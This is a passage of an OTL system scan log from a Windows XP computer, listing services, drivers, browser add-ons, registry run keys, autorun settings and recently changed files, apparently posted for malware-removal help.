[2008/08/07 15:48:30 | 00,192,512 | ---- | M] (Lightspeed Systems) -- C:\Program Files\Lightspeed Systems\User Agent\UAService.exe -- (UAService [Auto | Running])
[2006/11/03 19:19:58 | 00,013,592 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Windows Defender\MsMpEng.exe -- (WinDefend [Auto | Running])
[2006/10/18 20:05:24 | 00,913,408 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Windows Media Player\wmpnetwk.exe -- (WMPNetworkSvc [On_Demand | Stopped])

========== Driver Services ==========

[2009/02/05 15:05:11 | 00,026,944 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aavmker4.sys -- (Aavmker4 [System | Running])
[2002/04/01 14:15:00 | 00,004,816 | ---- | M] (Andrea Electronics Corporation) -- C:\WINDOWS\system32\drivers\aeaudio.sys -- (aeaudio [On_Demand | Running])
[2009/02/05 15:07:12 | 00,020,560 | ---- | M] (ALWIL Software) -- C:\WINDOWS\system32\drivers\aswFsBlk.sys -- (aswFsBlk [Auto | Running])
[2009/02/05 15:08:10 | 00,094,032 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswmon2.sys -- (aswMon2 [Auto | Running])
[2009/02/05 15:06:10 | 00,023,152 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswRdr.sys -- (aswRdr [On_Demand | Running])
[2009/02/05 15:07:23 | 00,114,768 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswSP.sys -- (aswSP [System | Running])
[2009/02/05 15:06:20 | 00,051,376 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswTdi.sys -- (aswTdi [System | Running])
[2004/12/13 16:14:00 | 00,039,904 | ---- | M] (Adaptec, Inc.) -- C:\WINDOWS\System32\drivers\cercsr6.sys -- (cercsr6 [Boot | Stopped])
[2008/04/14 00:09:48 | 00,206,976 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\drivers\Dot4.sys -- (dot4 [On_Demand | Stopped])
[2001/08/17 13:47:32 | 00,012,928 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\drivers\Dot4Prt.sys -- (Dot4Print [On_Demand | Stopped])
[2001/08/17 13:47:32 | 00,023,808 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\drivers\Dot4usb.sys -- (dot4usb [On_Demand | Stopped])
[2005/06/13 12:58:04 | 00,162,816 | ---- | M] (Intel Corporation) -- C:\WINDOWS\system32\drivers\e100b325.sys -- (E100B [On_Demand | Running])
[2008/01/29 12:01:28 | 00,016,168 | ---- | M] (GEAR Software Inc.) -- C:\WINDOWS\system32\drivers\GEARAspiWDM.sys -- (GEARAspiWDM [On_Demand | Running])
[2005/09/20 10:00:54 | 01,302,332 | ---- | M] (Intel Corporation) -- C:\WINDOWS\system32\drivers\ialmnt5.sys -- (ialm [On_Demand | Running])
[2008/04/14 00:09:50 | 00,014,592 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\drivers\kbdhid.sys -- (kbdhid [System | Stopped])
[2007/04/02 16:02:02 | 00,072,576 | ---- | M] (Mars Semiconductor Corp.) -- C:\WINDOWS\system32\drivers\marsqx5.sys -- (marsqx5 [On_Demand | Stopped])
[2001/08/22 08:42:58 | 00,013,632 | ---- | M] (Dell Computer Corporation) -- C:\WINDOWS\system32\drivers\omci.sys -- (OMCI [System | Running])
[2004/08/04 05:00:00 | 00,017,792 | ---- | M] (Parallel Technologies, Inc.) -- C:\WINDOWS\system32\drivers\ptilink.sys -- (Ptilink [On_Demand | Running])
[2004/09/23 02:03:00 | 00,020,576 | ---- | M] (Sonic Solutions) -- C:\WINDOWS\system32\drivers\pxhelp20.sys -- (PxHelp20 [Boot | Running])
[2009/02/26 06:23:02 | 00,110,848 | ---- | M] (Sophos Plc) -- C:\WINDOWS\system32\drivers\savonaccesscontrol.sys -- (SAVOnAccessControl [System | Running])
[2009/02/26 07:22:09 | 00,038,528 | ---- | M] (Sophos Plc) -- C:\WINDOWS\system32\drivers\savonaccessfilter.sys -- (SAVOnAccessFilter [System | Running])
[2007/11/13 05:25:53 | 00,020,480 | ---- | M] (Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.) -- C:\WINDOWS\system32\drivers\secdrv.sys -- (Secdrv [On_Demand | Stopped])
[2003/05/06 09:14:34 | 00,580,992 | ---- | M] (Analog Devices, Inc.) -- C:\WINDOWS\system32\drivers\smwdm.sys -- (smwdm [On_Demand | Running])
[2008/09/24 21:09:51 | 00,014,976 | ---- | M] (Sophos Plc) -- C:\WINDOWS\system32\drivers\SophosBootDriver.sys -- (SophosBootDriver [Disabled | Stopped])
[2003/04/15 10:40:54 | 00,113,504 | ---- | M] (Intel Corporation) -- C:\WINDOWS\system32\drivers\ialmsbw.sys -- ({6080A529-897E-4629-A488-ABA0C29B635E} [On_Demand | Stopped])
[2003/04/15 10:40:46 | 00,078,752 | ---- | M] (Intel Corporation) -- C:\WINDOWS\system32\drivers\ialmkchw.sys -- ({D31A0762-0CEB-444e-ACFF-B049A1F6FE91} [On_Demand | Stopped])

========== (R ) Internet Explorer ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main]
"Default_Page_URL"=http://go.microsoft.com/fwlink/?LinkId=69157
"Default_Search_URL"=http://go.microsoft.com/fwlink/?LinkId=54896
"Default_Secondary_Page_URL"=
"Extensions Off Page"=about:NoAdd-ons
"Local Page"=%SystemRoot%\system32\blank.htm
"Search Page"=http://go.microsoft.com/fwlink/?LinkId=54896
"Security Risk Page"=about:SecurityRisk
"Start Page"=http://go.microsoft.com/fwlink/?LinkId=69157

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Search]
"CustomizeSearch"=http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchcust.htm
"SearchAssistant"=http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchasst.htm

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main]
"Local Page"=C:\WINDOWS\system32\blank.htm
"Search Page"=http://go.microsoft.com/fwlink/?LinkId=54896
"Start Page"=http://go.microsoft.com/fwlink/?LinkId=69157

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\URLSearchHooks]
"{CFBFAE00-17A6-11D0-99CB-00C04FD64497}" (HKLM) -- C:\WINDOWS\system32\ieframe.dll (Microsoft Corporation)

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = 0

[HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\Main]

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = 0

[HKEY_USERS\S-1-5-18\SOFTWARE\Microsoft\Internet Explorer\Main]

[HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = 0

[HKEY_USERS\S-1-5-19\SOFTWARE\Microsoft\Internet Explorer\Main]

[HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Internet Explorer\Main]

[HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = 0

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-1191\SOFTWARE\Microsoft\Internet Explorer\Main]
"Local Page"=C:\WINDOWS\system32\blank.htm
"Search Page"=http://go.microsoft.com/fwlink/?LinkId=54896
"Start Page"=http://go.microsoft.com/fwlink/?LinkId=69157

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-1191\Software\Microsoft\Internet Explorer\URLSearchHooks]
"{CFBFAE00-17A6-11D0-99CB-00C04FD64497}" (HKLM) -- C:\WINDOWS\system32\ieframe.dll (Microsoft Corporation)

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-1191\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = 0

========== (O1) Hosts File ==========

HOSTS File = (734 bytes) - C:\WINDOWS\System32\drivers\etc\Hosts
First 25 entries...
127.0.0.1 localhost

========== (O2) BHO's ==========

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\]
{02478D38-C3F9-4efb-9B51-7695ECA05670} (HKLM) -- C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll (Yahoo! Inc.)
{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} (HKLM) -- C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll (Adobe Systems Incorporated)
{39EA7695-B3F2-4C44-A4BC-297ADA8FD235} (HKLM) -- C:\Program Files\Sophos\Sophos Anti-Virus\SophosBHO.dll (Sophos Plc)
{67BCF957-85FC-4036-8DC4-D4D80E00A77B} (HKLM) -- C:\Program Files\SMART Technologies Inc\Notebook Software\NotebookPlugin.dll (SMART Technologies Inc.)
{68F9551E-0411-48E4-9AAF-4BC42A6A46BE} (HKLM) -- C:\Program Files\Canon\Easy-WebPrint\EWPBrowseLoader.dll ()
{761497BB-D6F0-462C-B6EB-D4DAF1D92D43} (HKLM) -- C:\Program Files\Java\jre6\bin\ssv.dll (Sun Microsystems, Inc.)
{AA58ED58-01DD-4d91-8333-CF10577473F7} (HKLM) -- c:\Program Files\Google\GoogleToolbar1.dll (Google Inc.)
{AF69DE43-7D58-4638-B6FA-CE66B5AD205D} (HKLM) -- C:\Program Files\Google\GoogleToolbarNotifier\3.1.807.1746\swg.dll (Google Inc.)
{DBC80044-A445-435b-BC74-9C25C1C588A9} (HKLM) -- C:\Program Files\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
{E7E6F031-17CE-4C07-BC86-EABFE594F69C} (HKLM) -- C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll (Sun Microsystems, Inc.)
{FDAD4DA1-61A2-4FD8-9C17-86F7AC245081} (HKLM) -- C:\Program Files\Yahoo!\Companion\Installs\cpn\YTSingleInstance.dll (Yahoo! Inc)

========== (O3) Toolbars ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ToolBar]
"{2318C2B1-4965-11d4-9B18-009027A5CD4F}" (HKLM) -- c:\Program Files\Google\GoogleToolbar1.dll (Google Inc.)

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ToolBar]
"{327C2873-E90D-4c37-AA9D-10AC9BABA46C}" (HKLM) -- C:\Program Files\Canon\Easy-WebPrint\Toolband.dll ()

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ToolBar]
"{EF99BD32-C1FB-11D2-892F-0090271D4F88}" (HKLM) -- C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll (Yahoo! Inc.)

========== (O4) Run Keys ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Adobe Reader Speed Launcher"="C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe" (Adobe Systems Incorporated)
"avast!"=C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe (ALWIL Software)
"igfxhkcmd"=C:\WINDOWS\system32\hkcmd.exe (Intel Corporation)
"igfxpers"=C:\WINDOWS\system32\igfxpers.exe (Intel Corporation)
"igfxtray"=C:\WINDOWS\system32\igfxtray.exe (Intel Corporation)
"iTunesHelper"="C:\Program Files\iTunes\iTunesHelper.exe" (Apple Inc.)
"OpwareSE2"="C:\Program Files\ScanSoft\OmniPageSE2.0\OpwareSE2.exe" (ScanSoft, Inc.)
"QuickTime Task"="C:\Program Files\QuickTime\QTTask.exe" -atboottime (Apple Inc.)
"SunJavaUpdateSched"="C:\Program Files\Java\jre6\bin\jusched.exe" (Sun Microsystems, Inc.)
"Windows Defender"="C:\Program Files\Windows Defender\MSASCui.exe" -hide (Microsoft Corporation)

[HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"DWQueuedReporting"="C:\PROGRA~1\COMMON~1\MICROS~1\DW\dwtrig20.exe" -t (Microsoft Corporation)

[HKEY_USERS\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"DWQueuedReporting"="C:\PROGRA~1\COMMON~1\MICROS~1\DW\dwtrig20.exe" -t (Microsoft Corporation)

========== (O4) RunOnceEx Keys ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx]
""= File not found

========== (O4) Startup Folders ==========

[2009/01/28 07:32:24 | 00,245,760 | ---- | M] (Sophos Plc) -- C:\Documents and Settings\All Users\Start Menu\Programs\Startup\AutoUpdate Monitor.lnk = C:\Program Files\Sophos\AutoUpdate\ALMon.exe
[2005/07/22 03:47:22 | 00,151,552 | ---- | M] () -- C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Kodak EasyShare software.lnk = C:\Program Files\Kodak\Kodak EasyShare software\bin\EasyShare.exe
[2004/02/13 14:12:08 | 00,016,423 | ---- | M] () -- C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Kodak software updater.lnk = C:\Program Files\Kodak\KODAK Software Updater\7288971\Program\Kodak Software Updater.exe
[2007/11/02 05:48:46 | 04,519,176 | ---- | M] (SMART Technologies Inc.) -- C:\Documents and Settings\All Users\Start Menu\Programs\Startup\SMART Board Tools.lnk = C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardTools.exe

========== (O6 & O7) Current Version Policies ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"HonorAutoRunSetting"=1
"NoDriveTypeAutoRun"=255

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System]
"dontdisplaylastusername"=1
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1
"HideStartupScripts"=0

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoDriveTypeAutoRun"=145

[HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoDriveTypeAutoRun"=145

[HKEY_USERS\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoDriveTypeAutoRun"=145

[HKEY_USERS\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoDriveTypeAutoRun"=145

[HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoDriveTypeAutoRun"=145

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-1191\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoDriveTypeAutoRun"=145

========== (O8) IE Context Menu Extensions ==========

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\]
E&xport to Microsoft Excel: C:\Program Files\Microsoft Office\Office12\EXCEL.EXE [2008/10/18 19:30:22 | 17,931,616 | ---- | M] (Microsoft Corporation)

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-1191\Software\Microsoft\Internet Explorer\MenuExt\]
E&xport to Microsoft Excel: C:\Program Files\Microsoft Office\Office12\EXCEL.EXE [2008/10/18 19:30:22 | 17,931,616 | ---- | M] (Microsoft Corporation)

========== (O9) IE Extensions ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\]
{92780B25-18CC-41C8-B9BE-3C9C571A8263}: Button: Research -- %ProgramFiles%\Microsoft Office\Office12\REFIEBAR.DLL [2006/10/26 20:12:22 | 00,040,424 | ---- | M] (Microsoft Corporation)
{e2e2dd38-d088-4134-82b7-f2ba38496583}: Menu: @xpsp3res.dll,-20001 -- %SystemRoot%\network diagnostic\xpnetdiag.exe [2008/04/14 00:23:34 | 00,558,080 | ---- | M] (Microsoft Corporation)
{FB5F1910-F110-11d2-BB9E-00C04F795683}: Button: Messenger -- %ProgramFiles%\Messenger\msmsgs.exe [2008/04/14 05:42:30 | 01,695,232 | -HS- | M] (Microsoft Corporation)
{FB5F1910-F110-11d2-BB9E-00C04F795683}: Menu: Windows Messenger -- %ProgramFiles%\Messenger\msmsgs.exe [2008/04/14 05:42:30 | 01,695,232 | -HS- | M] (Microsoft Corporation)

========== (O12) Internet Explorer Plugins ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Plugins\]
PluginsPage: "" = http://activex.microsoft.com/controls/find...=%s&mime=%s
PluginsPageFriendlyName: "" = Microsoft ActiveX Gallery

========== (O13) Default Prefixes ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\DefaultPrefix]
""=http://

========== (O15) Trusted Sites ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\]
1 domain(s) and sub-domain(s) not assigned to a zone.

========== (O16) DPF ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\]
{05CA9FB0-3E3E-4B36-BF41-0E3A5CAA8CD8}: http://download.microsoft.com/download/e/4.../OGAControl.cab -- Office Genuine Advantage Validation Tool
{166B1BCA-3F9C-11CF-8075-444553540000}: http://fpdownload.macromedia.com/pub/shock...director/sw.cab -- Shockwave ActiveX Control
{6414512B-B978-451D-A0D8-FCFDF33E833C}: http://www.update.microsoft.com/windowsupd...b?1207583621953 -- WUWebControl Class
{8AD9C840-044E-11D1-B3E9-00805F499D93}: http://java.sun.com/update/1.6.0/jinstall-...indows-i586.cab -- Java Plug-in 1.6.0_11
{8FFBE65D-2C9C-4669-84BD-5829DC0B603C}: http://fpdownload.macromedia.com/get/flash...t/ultrashim.cab -- Reg Error: Key does not exist or could not be opened.
{CAFEEFAC-0016-0000-0005-ABCDEFFEDCBA}: http://java.sun.com/update/1.6.0/jinstall-...indows-i586.cab -- Java Plug-in 1.6.0_05
{CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA}: http://java.sun.com/update/1.6.0/jinstall-...indows-i586.cab -- Java Plug-in 1.6.0_07
{CAFEEFAC-0016-0000-0011-ABCDEFFEDCBA}: http://java.sun.com/update/1.6.0/jinstall-...indows-i586.cab -- Java Plug-in 1.6.0_11
{CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA}: http://java.sun.com/update/1.6.0/jinstall-...indows-i586.cab -- Java Plug-in 1.6.0_11
{CF40ACC5-E1BB-4AFF-AC72-04C2F616BCA7}: http://wwwimages.adobe.com/www.adobe.com/p...obat/nos/gp.cab -- get_atlcom Class
{D27CDB6E-AE6D-11CF-96B8-444553540000}: http://fpdownload2.macromedia.com/get/flas...ent/swflash.cab -- Shockwave Flash Object

========== (O17) DNS Name Servers ==========

{720F02B9-5075-43F0-94E6-6DA8794CF151} (Servers: | Description: Intel® PRO/100 VE Network Connection)
{8F7A4464-81D4-41DD-A0B3-6A6A2E8643FF} (Servers: | Description: )

========== (O20) AppInit_DLLs ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_Dlls"=C:\PROGRA~1\Sophos\SOPHOS~1\SOPHOS~1.DLL
>[2009/04/02 05:04:34 | 00,164,864 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\sophos_detoured.dll

========== (O20) Winlogon Notify Settings ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\]
igfxcui: "DllName" = igfxdev.dll -- C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)

========== Shell Execute Hooks ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
"{091EB208-39DD-417D-A5DD-7E2C2D8FB9CB}" (HKLM) -- C:\Program Files\Windows Defender\MpShHook.dll (Microsoft Corporation)

========== CDRom AutoRun Settings ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom]
"AutoRun" = 1

========== Autorun Files on Drives ==========

AUTOEXEC.BAT []
[2008/04/07 10:34:23 | 00,000,000 | ---- | M] () -- C:\AUTOEXEC.BAT -- [ NTFS ]

auto []
[2009/04/02 10:37:46 | 00,000,000 | -HSD | M] -- E:\auto -- [ FAT ]

========== Files/Folders - Created Within 60 Days ==========

[1 C:\WINDOWS\System32\*.tmp files]
[6 C:\WINDOWS\*.tmp files]
[2009/04/02 13:45:28 | 00,422,912 | ---- | C] (OldTimer Tools) -- C:\Documents and Settings\dreger\Desktop\powerpnt.exe.exe
[2009/04/02 13:38:09 | 00,401,720 | ---- | C] (Trend Micro Inc.) -- C:\HiJackThis.exe
[2009/04/01 13:45:26 | 00,023,152 | ---- | C] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswRdr.sys
[2009/04/01 13:45:26 | 00,001,724 | ---- | C] () -- C:\Documents and Settings\All Users\Desktop\avast! Antivirus.lnk
[2009/04/01 13:45:24 | 00,051,376 | ---- | C] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswTdi.sys
[2009/04/01 13:45:22 | 00,026,944 | ---- | C] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aavmker4.sys
[2009/04/01 13:45:19 | 00,097,480 | ---- | C] (ALWIL Software) -- C:\WINDOWS\System32\AvastSS.scr
[2009/04/01 13:45:18 | 00,114,768 | ---- | C] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswSP.sys
[2009/04/01 13:45:18 | 00,094,032 | ---- | C] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswmon2.sys
[2009/04/01 13:45:18 | 00,093,296 | ---- | C] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswmon.sys
[2009/04/01 13:45:18 | 00,020,560 | ---- | C] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswFsBlk.sys
[2009/04/01 13:44:59 | 01,256,296 | ---- | C] (ALWIL Software) -- C:\WINDOWS\System32\aswBoot.exe
[2009/04/01 13:44:59 | 00,380,928 | ---- | C] () -- C:\WINDOWS\System32\actskin4.ocx
[2009/04/01 13:44:55 | 00,000,000 | ---D | C] -- C:\Program Files\Alwil Software
[2009/04/01 13:44:24 | 00,612,740 | ---- | C] () -- C:\cc_20090401_134419.reg
[2009/04/01 13:21:59 | 00,000,000 | -H-D | C] -- C:\WINDOWS\System32\GroupPolicy
[2009/04/01 13:03:09 | 00,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Yahoo! Companion
[2009/04/01 13:03:03 | 00,000,000 | ---D | C] -- C:\Program Files\Yahoo!
[2009/04/01 13:02:50 | 00,000,000 | ---D | C] -- C:\Program Files\CCleaner
[2009/04/01 11:05:11 | 00,000,000 | R-SD | C] -- C:\assembly
[2009/04/01 08:17:06 | 00,082,944 | ---- | C] (S!Ri.URZ) -- C:\WINDOWS\System32\IEDFix.C.exe
[2009/04/01 08:17:06 | 00,080,384 | ---- | C] (S!Ri.URZ) -- C:\WINDOWS\System32\o4Patch.exe
[2009/04/01 08:17:06 | 00,078,336 | ---- | C] (S!Ri.URZ) -- C:\WINDOWS\System32\Agent.OMZ.Fix.exe
[2009/04/01 08:17:04 | 00,288,417 | ---- | C] (S!Ri) -- C:\WINDOWS\System32\SrchSTS.exe
[2009/04/01 08:17:04 | 00,053,248 | ---- | C] (http://www.beyondlogic.org) -- C:\WINDOWS\System32\Process.exe
[2009/04/01 08:12:16 | 00,000,000 | ---D | C] -- C:\ERDNT
[2009/04/01 08:12:13 | 00,000,000 | ---D | C] -- C:\WINDOWS\ERUNT
[2009/04/01 08:12:13 | 00,000,000 | ---D | C] -- C:\WINDOWS\ERDNT
[2009/04/01 08:11:34 | 00,000,000 | ---D | C] -- C:\!FixIEDef
[2009/03/30 11:04:40 | 00,000,000 | ---D | C] -- C:\WINDOWS\pss
[2009/03/27 09:01:01 | 03,776,976 | -H-- | C] () -- C:\Documents and Settings\dreger\Local Settings\Application Data\IconCache.db
[2009/03/27 08:58:48 | 00,000,000 | ---D | C] -- C:\Documents and Settings\dreger\Local Settings\Application Data\Apple Computer
[2009/03/27 08:58:22 | 00,000,000 | ---D | C] -- C:\Documents and Settings\dreger\Application Data\SMART Technologies Inc
[2009/03/27 08:58:05 | 00,071,328 | ---- | C] () -- C:\Documents and Settings\dreger\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
[2009/03/27 08:57:42 | 00,000,000 | ---D | C] -- C:\Documents and Settings\dreger\Application Data\Identities
[2009/03/27 08:57:37 | 00,000,077 | -HS- | C] () -- C:\Documents and Settings\dreger\My Documents\desktop.ini
[2009/03/27 08:57:37 | 00,000,000 | R--D | C] -- C:\Documents and Settings\dreger\My Documents\My Pictures
[2009/03/27 08:57:37 | 00,000,000 | R--D | C] -- C:\Documents and Settings\dreger\My Documents\My Music
[2009/03/27 08:57:32 | 00,000,062 | -HS- | C] () -- C:\Documents and Settings\dreger\Application Data\desktop.ini
[2009/03/27 08:57:31 | 00,000,084 | -HS- | C] () -- C:\Documents and Settings\dreger\Start Menu\Programs\Startup\desktop.ini
[2009/03/27 08:57:30 | 00,000,000 | --SD | C] -- C:\Documents and Settings\dreger\Application Data\Microsoft
[2009/03/27 08:57:30 | 00,000,000 | ---D | C] -- C:\Documents and Settings\dreger\Local Settings\Application Data\Microsoft Help
[2009/03/27 08:57:30 | 00,000,000 | ---D | C] -- C:\Documents and Settings\dreger\Local Settings\Application Data\Microsoft
[2009/03/18 09:33:58 | 00,000,000 | -H-D | C] -- C:\Program Files\Zero G Registry
[2009/03/18 09:33:58 | 00,000,000 | ---D | C] -- C:\Program Files\PEM
[2009/03/17 12:56:39 | 00,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\NOS
[2009/03/17 12:56:37 | 00,000,000 | ---D | C] -- C:\Program Files\NOS
[2009/03/10 22:18:14 | 00,934,792 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\WgaTray.exe
[2009/03/10 22:18:14 | 00,934,792 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\WgaTray.exe
[2009/03/10 22:18:00 | 00,239,496 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\WgaLogon.dll
[2009/03/10 22:18:00 | 00,239,496 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\wgaLogon.dll
[2009/02/11 14:08:05 | 00,000,000 | ---D | C] -- C:\WINDOWS\SQL9_KB960089_ENU
[2009/02/02 08:56:08 | 00,000,000 | ---D | C] -- C:\Program Files\Lightspeed Systems

========== Files - Modified Within 60 Days ==========

[1 C:\WINDOWS\System32\*.tmp files]
[6 C:\WINDOWS\*.tmp files]
[2009/04/02 13:45:40 | 00,000,330 | -H-- | M] () -- C:\WINDOWS\tasks\MP Scheduled Scan.job
[2009/04/02 13:45:19 | 00,065,536 | R--- | M] () -- C:\Documents and Settings\All Users\Documents\ESBK.mbb
[2009/04/02 13:45:18 | 00,079,872 | R--- | M] () -- C:\Documents and Settings\All Users\Documents\ESBK.mb
[2009/04/02 13:43:58 | 00,002,206 | ---- | M] () -- C:\WINDOWS\System32\wpa.dbl
[2009/04/02 13:42:56 | 00,000,402 | ---- | M] () -- C:\WINDOWS\tasks\gpupdate.job
[2009/04/02 13:42:46 | 00,000,006 | -H-- | M] () -- C:\WINDOWS\tasks\SA.DAT
[2009/04/02 13:42:29 | 00,002,048 | --S- | M] () -- C:\WINDOWS\bootstat.dat
[2009/04/02 13:41:18 | 03,776,976 | -H-- | M] () -- C:\Documents and Settings\dreger\Local Settings\Application Data\IconCache.db
[2009/04/02 13:34:08 | 00,401,720 | ---- | M] (Trend Micro Inc.) -- C:\HiJackThis.exe
[2009/04/02 13:33:26 | 00,422,912 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\dreger\Desktop\powerpnt.exe.exe
[2009/04/01 14:11:21 | 00,002,626 | ---- | M] () -- C:\WINDOWS\System32\CONFIG.NT
[2009/04/01 13:45:26 | 00,001,724 | ---- | M] () -- C:\Documents and Settings\All Users\Desktop\avast! Antivirus.lnk
[2009/04/01 13:44:27 | 00,612,740 | ---- | M] () -- C:\cc_20090401_134419.reg
[2009/03/31 09:52:47 | 00,000,072 | ---- | M] () -- C:\WINDOWS\bi_group.ini
[2009/03/30 11:05:16 | 00,000,227 | ---- | M] () -- C:\WINDOWS\system.ini
[2009/03/30 11:05:16 | 00,000,211 | -HS- | M] () -- C:\boot.ini
[2009/03/30 11:05:16 | 00,000,000 | ---- | M] () -- C:\WINDOWS\win.ini
[2009/03/27 23:22:03 | 00,000,284 | ---- | M] () -- C:\WINDOWS\tasks\AppleSoftwareUpdate.job
[2009/03/27 08:58:05 | 00,071,328 | ---- | M] () -- C:\Documents and Settings\dreger\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
[2009/03/27 08:57:50 | 00,000,077 | -HS- | M] () -- C:\Documents and Settings\dreger\My Documents\desktop.ini
[2009/03/20 22:07:21 | 00,491,236 | ---- | M] () -- C:\WINDOWS\System32\perfh009.dat
[2009/03/20 22:07:21 | 00,089,674 | ---- | M] () -- C:\WINDOWS\System32\perfc009.dat
[2009/03/20 22:07:20 | 00,527,328 | ---- | M] () -- C:\WINDOWS\System32\PerfStringBackup.INI
[2009/03/17 13:16:59 | 00,278,152 | ---- | M] () -- C:\WINDOWS\System32\FNTCACHE.DAT
[2009/03/10 22:18:20 | 01,482,112 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\LegitCheckControl.dll
